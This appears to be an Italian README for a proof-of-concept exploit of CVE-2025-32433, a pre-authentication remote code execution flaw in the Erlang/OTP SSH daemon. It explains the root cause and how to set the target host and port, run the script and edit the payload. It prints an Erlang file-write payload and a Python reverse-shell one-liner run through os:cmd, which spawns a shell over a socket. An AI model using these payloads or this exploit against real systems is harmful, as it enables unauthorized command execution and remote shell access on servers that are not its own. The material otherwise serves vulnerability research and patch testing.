
Exploit proof-of-concept per CVE-2025-32433, una RCE pre-autenticazione nel demone SSH di Erlang/OTP. Include uno script Python per inviare richieste di canale SSH appositamente create ed eseguire comandi arbitrari.
CVE-2025-32433 è una vulnerabilità di esecuzione remota di codice (RCE) che interessa il demone SSH di Erlang/OTP.
La causa principale è la gestione non corretta delle richieste di canale SSH pre-autenticazione, che possono essere manipolate da un attaccante per
provocare l'esecuzione arbitraria di comandi prima dell'autenticazione.
Il PoC incluso dimostra l'invio di tali pacchetti SSH modificati; per impostazione predefinita scrive /lab.txt sul sistema target, ma può essere adattato per altri comandi.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
Per impostazione predefinita crea /lab.txt contenente pwned.
Modifica il payload in build_channel_request per eseguire i tuoi comandi.
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT modificato per simulare un handshake normale.SSH_MSG_CHANNEL_OPEN e SSH_MSG_CHANNEL_REQUEST con un payload exec prima dell'autenticazione.Scoperta e analisi a cura di Matt Keeley (Platform Security). Grazie a lui per aver pubblicato il PoC e condiviso i dettagli.
Link al blog: https://platformsecurity.com/blog/CVE-2025-32433-poc